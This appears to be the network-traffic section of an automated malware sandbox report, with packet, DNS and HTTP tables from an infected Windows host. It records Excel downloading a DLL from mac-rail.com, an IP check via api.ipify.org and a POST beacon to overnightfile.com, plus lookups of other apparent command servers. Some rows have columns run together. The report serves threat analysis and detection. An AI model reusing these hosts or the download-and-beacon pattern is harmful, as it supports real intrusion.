                                                                                                                                      Jul 14, 2020 11:22:06.795124054 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:06.887067080 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.887274981 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:07.203433037 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:07.291778088 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:07.292035103 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:07.598186016 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:07.690946102 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:07.691148043 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:07.855670929 CEST4971880192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:08.014770985 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:08.102183104 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:08.102464914 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:08.406220913 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:08.494173050 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:08.494488955 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:08.816091061 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:08.903805017 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:08.904094934 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:09.197422981 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:09.287599087 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:09.287801027 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:09.590527058 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:09.682044029 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:09.682295084 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:10.301146030 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:10.389384031 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:10.389563084 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:10.741204023 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:10.832273006 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:10.832544088 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:11.658440113 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:11.747596025 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:11.747876883 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:12.201524973 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:12.292340040 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:12.292546034 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:13.004404068 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:13.092058897 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:13.092261076 CEST4971680192.168.1.10291.218.231.226
Jul 14, 2020 11:22:13.399946928 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:13.490073919 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:13.490201950 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:13.793641090 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:13.883595943 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:13.883878946 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:14.181653023 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:14.269927025 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:14.270174026 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:14.571012974 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:14.658760071 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:14.659094095 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:14.983218908 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:15.075644016 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:15.075856924 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:15.396648884 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:15.490426064 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:15.490763903 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:15.789973021 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:15.878448963 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:15.878844023 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:16.183455944 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:16.271142006 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:16.271306992 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:16.595324993 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:16.685844898 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:16.686019897 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:16.982656956 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:17.069825888 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:17.070086002 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:17.381412029 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:17.469480038 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:17.469810009 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:17.825907946 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:17.913518906 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:17.913842916 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:18.221539021 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:18.312180042 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:18.312611103 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:18.600039959 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:18.687941074 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:18.688205957 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:19.011029959 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:19.104196072 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:19.104494095 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:19.412626982 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:19.503447056 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:19.503609896 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:19.814019918 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:19.908598900 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:19.908792973 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:20.210131884 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:20.309923887 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:20.313064098 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:20.313245058 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:20.631592989 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:20.691512108 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:20.719944954 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:20.720216990 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:21.028626919 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:21.124447107 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:21.124778032 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:21.448781013 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:21.547868967 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:21.548600912 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:21.548993111 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:21.869719982 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:21.929754019 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:21.966259003 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:21.966571093 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:22.263708115 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:22.359987974 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:22.360060930 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:22.361181021 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:22.361475945 CEST  49716  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:22.421087980 CEST  80     49716  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:22.698374033 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:22.762545109 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:22.762788057 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:22.764802933 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:22.828950882 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:22.866281986 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:22.866508007 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:23.183684111 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:23.287776947 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:23.288708925 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:23.288923979 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:23.594024897 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:23.627722979 CEST  49710  443    192.168.1.102    185.206.163.136
Jul 14, 2020 11:22:23.627759933 CEST  49710  443    192.168.1.102    185.206.163.136
Jul 14, 2020 11:22:23.628463030 CEST  49709  443    192.168.1.102    185.206.163.136
Jul 14, 2020 11:22:23.628516912 CEST  49709  443    192.168.1.102    185.206.163.136
Jul 14, 2020 11:22:23.629050016 CEST  49705  80     192.168.1.102    54.225.191.113
Jul 14, 2020 11:22:23.658150911 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:23.701631069 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:23.701955080 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:23.725832939 CEST  80     49705  54.225.191.113   192.168.1.102
Jul 14, 2020 11:22:24.007934093 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:24.071943998 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:24.110548973 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:24.111807108 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:24.408555984 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:24.502304077 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:24.502701998 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:24.818351030 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:24.910289049 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:24.910696983 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:25.244096041 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:25.340518951 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:25.340783119 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:25.688595057 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:25.783973932 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:25.784248114 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:26.096357107 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:26.191376925 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:26.191543102 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:26.510360956 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:26.605473042 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:26.605854988 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:26.888808012 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:26.980513096 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:26.980798006 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:27.289052010 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:27.383918047 CEST  80     49719  91.218.231.226   192.168.1.102
Jul 14, 2020 11:22:27.384140015 CEST  49719  80     192.168.1.102    91.218.231.226
Jul 14, 2020 11:22:28.653850079 CEST  49720  80     192.168.1.102    8.208.80.226
Jul 14, 2020 11:22:28.653912067 CEST  49721  80     192.168.1.102    8.208.80.226
Jul 14, 2020 11:22:28.691236019 CEST  80     49721  8.208.80.226     192.168.1.102
Jul 14, 2020 11:22:28.691276073 CEST  80     49720  8.208.80.226     192.168.1.102
Jul 14, 2020 11:22:28.691459894 CEST  49721  80     192.168.1.102    8.208.80.226
Jul 14, 2020 11:22:28.691507101 CEST  49720  80     192.168.1.102    8.208.80.226
Jul 14, 2020 11:22:28.692337990 CEST  49721  80     192.168.1.102    8.208.80.226
Jul 14, 2020 11:22:28.770314932 CEST  80     49721  8.208.80.226     192.168.1.102
Jul 14, 2020 11:22:28.938731909 CEST  80     49721  8.208.80.226     192.168.1.102
Jul 14, 2020 11:22:28.938761950 CEST  80     49721  8.208.80.226     192.168.1.102
Jul 14, 2020 11:22:28.938843966 CEST  49721  80     192.168.1.102    8.208.80.226
Jul 14, 2020 11:22:28.940252066 CEST  49721  80     192.168.1.102    8.208.80.226
Jul 14, 2020 11:22:28.977508068 CEST  80     49721  8.208.80.226     192.168.1.102
Jul 14, 2020 11:22:30.036714077 CEST  49720  80     192.168.1.102    8.208.80.226

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jul 14, 2020 11:20:13.531610966 CEST  49383        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:13.544059038 CEST  56207        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:13.567631006 CEST  53           56207      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:13.571919918 CEST  53           49383      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:14.008306980 CEST  53477        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:14.047723055 CEST  53           53477      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:23.698698044 CEST  59765        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:24.043000937 CEST  53           59765      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:33.805907011 CEST  56491        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:33.829677105 CEST  53           56491      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:34.154738903 CEST  54834        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:34.463275909 CEST  53           54834      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:34.689542055 CEST  55551        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:34.835613012 CEST  53           55551      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:39.824157953 CEST  58258        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:40.141748905 CEST  53           58258      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:47.429687023 CEST  50042        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:47.461544991 CEST  53           50042      8.8.8.8          192.168.1.102
Jul 14, 2020 11:20:54.150916100 CEST  56374        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:20:54.174556017 CEST  53           56374      8.8.8.8          192.168.1.102
Jul 14, 2020 11:21:15.361723900 CEST  60220        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:21:15.394793034 CEST  53           60220      8.8.8.8          192.168.1.102
Jul 14, 2020 11:21:19.415286064 CEST  57148        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:21:19.781559944 CEST  53           57148      8.8.8.8          192.168.1.102
Jul 14, 2020 11:21:45.370604992 CEST  57038        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:21:45.404340029 CEST  53           57038      8.8.8.8          192.168.1.102
Jul 14, 2020 11:21:46.386745930 CEST  57038        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:21:46.418695927 CEST  53           57038      8.8.8.8          192.168.1.102
Jul 14, 2020 11:21:47.395742893 CEST  57038        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:21:47.427670956 CEST  53           57038      8.8.8.8          192.168.1.102
Jul 14, 2020 11:21:49.399339914 CEST  57038        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:21:49.423011065 CEST  53           57038      8.8.8.8          192.168.1.102
Jul 14, 2020 11:21:53.407613993 CEST  57038        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:21:53.439635038 CEST  53           57038      8.8.8.8          192.168.1.102
Jul 14, 2020 11:22:03.245176077 CEST  64159        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:22:03.278695107 CEST  53           64159      8.8.8.8          192.168.1.102
Jul 14, 2020 11:22:05.000102997 CEST  65439        53         192.168.1.102    8.8.8.8
Jul 14, 2020 11:22:06.001909018 CEST  65439        53         192.168.1.102    8.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:06.310211897 CEST53654398.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.364929914 CEST53654398.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:27.949683905 CEST5198753192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:27.982810020 CEST53519878.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:28.345123053 CEST5892053192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:28.647974968 CEST53589208.8.8.8192.168.1.102

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 14, 2020 11:22:06.364996910 CEST | 192.168.1.102 | 8.8.8.8 | cf63 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 14, 2020 11:20:23.698698044 CEST | 192.168.1.102 | 8.8.8.8 | 0x754e | Standard query (0) | mac-rail.com | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.805907011 CEST | 192.168.1.102 | 8.8.8.8 | 0x15ba | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:34.154738903 CEST | 192.168.1.102 | 8.8.8.8 | 0x6135 | Standard query (0) | overnightfile.com | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:34.689542055 CEST | 192.168.1.102 | 8.8.8.8 | 0xb634 | Standard query (0) | accesoeducativo.com | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:39.824157953 CEST | 192.168.1.102 | 8.8.8.8 | 0x343a | Standard query (0) | overnightfile.com | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:47.429687023 CEST | 192.168.1.102 | 8.8.8.8 | 0x2499 | Standard query (0) | overnightfile.com | A (IP address) | IN (0x0001)
Jul 14, 2020 11:21:19.415286064 CEST | 192.168.1.102 | 8.8.8.8 | 0x55c | Standard query (0) | gaw.explik.at | A (IP address) | IN (0x0001)
Jul 14, 2020 11:22:05.000102997 CEST | 192.168.1.102 | 8.8.8.8 | 0xdc75 | Standard query (0) | gaw.explik.at | A (IP address) | IN (0x0001)
Jul 14, 2020 11:22:06.001909018 CEST | 192.168.1.102 | 8.8.8.8 | 0xdc75 | Standard query (0) | gaw.explik.at | A (IP address) | IN (0x0001)
Jul 14, 2020 11:22:28.345123053 CEST | 192.168.1.102 | 8.8.8.8 | 0xef59 | Standard query (0) | low.explik.at | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 14, 2020 11:20:13.567631006 CEST | 8.8.8.8 | 192.168.1.102 | 0x6473 | No error (0) | l-0014.config.skype.com | config-edge-skype.l-0014.l-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Jul 14, 2020 11:20:24.043000937 CEST | 8.8.8.8 | 192.168.1.102 | 0x754e | No error (0) | mac-rail.com | | 5.101.51.247 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:24.043000937 CEST | 8.8.8.8 | 192.168.1.102 | 0x754e | No error (0) | mac-rail.com | | 8.211.45.110 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | api.ipify.org | nagano-19599.herokussl.com | | CNAME (Canonical name) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.191.113 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.136.99 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.182.172 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.213.140 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.83.248 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 107.22.251.25 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.221.234.156 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:33.829677105 CEST | 8.8.8.8 | 192.168.1.102 | 0x15ba | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 174.129.255.253 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:34.463275909 CEST | 8.8.8.8 | 192.168.1.102 | 0x6135 | No error (0) | overnightfile.com | | 91.218.231.226 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:34.835613012 CEST | 8.8.8.8 | 192.168.1.102 | 0xb634 | No error (0) | accesoeducativo.com | | 185.206.163.136 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:40.141748905 CEST | 8.8.8.8 | 192.168.1.102 | 0x343a | No error (0) | overnightfile.com | | 91.218.231.226 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:20:47.461544991 CEST | 8.8.8.8 | 192.168.1.102 | 0x2499 | No error (0) | overnightfile.com | | 91.218.231.226 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:21:19.781559944 CEST | 8.8.8.8 | 192.168.1.102 | 0x55c | No error (0) | gaw.explik.at | | 8.208.80.226 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:22:06.310211897 CEST | 8.8.8.8 | 192.168.1.102 | 0xdc75 | No error (0) | gaw.explik.at | | 8.208.80.226 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:22:06.364929914 CEST | 8.8.8.8 | 192.168.1.102 | 0xdc75 | No error (0) | gaw.explik.at | | 8.208.80.226 | A (IP address) | IN (0x0001)
Jul 14, 2020 11:22:28.647974968 CEST | 8.8.8.8 | 192.168.1.102 | 0xef59 | No error (0) | low.explik.at | | 8.208.80.226 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• mac-rail.com
• api.ipify.org
• overnightfile.com
• gaw.explik.at
• low.explik.at

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.1.102 | 49704 | 5.101.51.247 | 80 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 14, 2020 11:20:24.193181992 CEST | 129 | OUT | GET /434.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: mac-rail.com
Connection: Keep-Alive
Jul 14, 2020 11:20:24.407891035 CEST | 131 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jul 2020 09:20:24 GMT
Content-Type: application/octet-stream
Content-Length: 375808
Connection: keep-alive
Last-Modified: Mon, 13 Jul 2020 09:45:24 GMT
ETag: "5f0c2d34-5bc00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.1.102 | 49705 | 54.225.191.113 | 80 | C:\Windows\SysWOW64\svchost.exe

Timestamp | kBytes transferred | Direction | Data
Jul 14, 2020 11:20:33.993360996 CEST | 515 | OUT | GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache
Jul 14, 2020 11:20:34.096435070 CEST | 515 | IN | HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Tue, 14 Jul 2020 09:20:34 GMT
Content-Length: 11
Via: 1.1 vegur
Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 36
Data Ascii: 84.17.52.36


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      2192.168.1.1024970691.218.231.22680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:20:34.531091928 CEST516OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
